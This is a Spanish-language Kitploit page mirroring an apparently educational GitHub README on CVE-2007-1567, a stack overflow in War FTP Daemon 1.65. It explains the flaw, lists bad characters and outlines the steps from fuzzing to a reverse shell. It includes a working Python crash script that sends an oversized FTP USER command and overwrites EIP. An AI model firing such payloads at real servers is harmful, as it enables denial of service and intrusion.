Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2007-1567 — Desbordamiento de búfer clásico basado en pila en War FTP Daemon 1.65 que demuestra la ejecución remota de código de la vieja escuela mediante comandos FTP malformados. | Kitploit
Herramientas/GitHubGitHub/themalwareguardian/cve-2007-1567
Análisis de VulnerabilidadesExplotaciónShellcodeAprendizaje y EducaciónHerramienta de Acceso RemotoExplotación de Binarios
GitHubthemalwareguardian/cve-2007-1567

CVE-2007-1567

Desbordamiento de búfer clásico basado en pila en War FTP Daemon 1.65 que demuestra la ejecución remota de código de la vieja escuela mediante comandos FTP malformados.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 4 mesesAún no revisado

🐞 CVE-2007-1567: War FTP Daemon 1.65 - Desbordamiento de Búfer Basado en Pila

Desbordamiento de búfer basado en pila clásico en War FTP Daemon 1.65 que demuestra la ejecución remota de código de la vieja escuela mediante comandos FTP malformados.




📑 Tabla de Contenidos

  • Por qué existe este repositorio
  • Por qué esta vulnerabilidad es interesante
  • Contexto y software afectado
  • Sobre la vulnerabilidad
  • Provocando la caída
  • Explotación



🎓 Por qué existe este repositorio

Este repositorio forma parte del material que utilizo cuando enseño explotación de corrupción de memoria (además de mi trabajo habitual, también imparto cursos en diferentes formaciones de ciberseguridad donde ayudo a formar a la próxima generación de ingenieros inversos).

CVE-2007-1567 es un caso que utilizo justo después de introducir los conceptos básicos de las sobrescrituras de EIP clásicas. La explotación es limpia y directa, pero incluye un detalle que la hace un poco más interesante que un primer ejercicio típico: un carácter malo adicional que introduce el protocolo FTP y que los estudiantes deben identificar y tener en cuenta al construir su shellcode. Es una pequeña restricción, pero suficiente para hacer que los estudiantes piensen en lugar de simplemente copiar una técnica que ya utilizaron.




💡 Por qué esta vulnerabilidad es interesante

War FTP Daemon 1.65 es un servidor FTP de Windows heredado de finales de los años 90. La vulnerabilidad está en el controlador del comando USER, que usa sprintf para copiar la entrada controlada por el usuario en un búfer de pila de tamaño fijo sin validar su longitud. Lo que hace que este caso sea útil para la enseñanza:

  • No requiere autenticación. El desbordamiento se dispara en el controlador del comando USER, antes de que se verifique cualquier contraseña. Un solo comando es suficiente para provocar la caída.
  • Sobrescritura directa de EIP. Sin SEH, sin heap, sin explotación en múltiples etapas. La dirección de retorno guardada se sobrescribe directamente.
  • Un carácter malo adicional. Más allá de los habituales \x00, \x0a y \x0d, el protocolo FTP introduce \x40 (@) como carácter malo porque interpreta la sintaxis usuario@host. Los estudiantes deben identificarlo durante el análisis de caracteres malos.
  • Requiere un entorno Windows antiguo. A diferencia de la mayoría del software heredado que uso para enseñar, War FTP Daemon 1.65 no se puede ejecutar en Windows moderno debido a los cambios en la API Winsock. Requiere Windows XP, lo que añade un reto práctico de configuración y enseña a los estudiantes que el entorno de laboratorio importa.



🔍 Contexto y software afectado

War FTP Daemon es un servidor FTP para Windows escrito originalmente a finales de los años 90. Escucha en el puerto TCP 21 y gestiona comandos FTP estándar. La vulnerabilidad está en el controlador del comando USER, que procesa el nombre de usuario enviado por un cliente conectado mediante sprintf sin validación de longitud.

Detalles técnicos clave:

  • Tipo de vulnerabilidad: Desbordamiento de búfer basado en pila
Descargar herramienta
  • Versión afectada: War FTP Daemon 1.65
  • Endpoint afectado: comando USER de FTP
  • Componente vulnerable: controlador del comando USER
  • Autenticación requerida: No
  • Impacto: Ejecución remota de código



  • ⚠️ Sobre la vulnerabilidad

    War FTP Daemon procesa el comando USER pasando el nombre de usuario proporcionado a sprintf, que lo copia en un búfer de pila de tamaño fijo sin comprobar su longitud. Una versión simplificada de la lógica vulnerable es la siguiente:

    root@kitploit:~
    char buffer[256];
    
    sprintf(buffer, "%sCRLF", username);
    

    Enviar una cadena lo suficientemente larga como argumento USER hace que la copia escriba más allá del final del búfer, corrompiendo la pila hasta que se sobrescribe la dirección de retorno guardada. Cuando la función retorna, la CPU carga el valor controlado por el atacante desde la pila en EIP y salta a él.




    💥 Provocando la caída

    La caída se puede reproducir enviando un argumento USER de gran tamaño a través de FTP. No se requiere autenticación. Ejemplo con Python:

    root@kitploit:~
    import socket
    
    HOST = '127.0.0.1'
    PORT = 21
    
    payload = b"A" * 700
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.recv(1024)
    
    s.send(b"USER " + payload + b"\r\n")
    s.close()
    

    Cuando se ejecuta bajo un depurador, la caída muestra EIP sobrescrito con datos controlados por el usuario:

    root@kitploit:~
    EIP = 41414141
    

    lo que confirma que la dirección de retorno guardada ha sido corrompida por el desbordamiento.




    💣 Explotación

    El objetivo de este repositorio no es solo demostrar la caída, sino recorrer el proceso completo de explotación paso a paso, desde el fuzzing hasta una shell inversa funcional.

    Para mantener el README principal limpio, las notas detalladas de explotación, los scripts y los pasos de depuración están ubicados en la carpeta Vulnerability 📂 de este repositorio.

    Allí encontrarás el flujo de trabajo completo utilizado para explotar este CVE, incluyendo:

    • Fuzzing del comando USER para identificar la caída.
    • Descubrimiento del offset para localizar la posición exacta de EIP en la pila.
    • Análisis de caracteres malos, incluido el carácter \x40 específico del manejo del USER en FTP.
    • Localización de un gadget JMP ESP en MFC42.dll.
    • Colocación y ejecución del shellcode.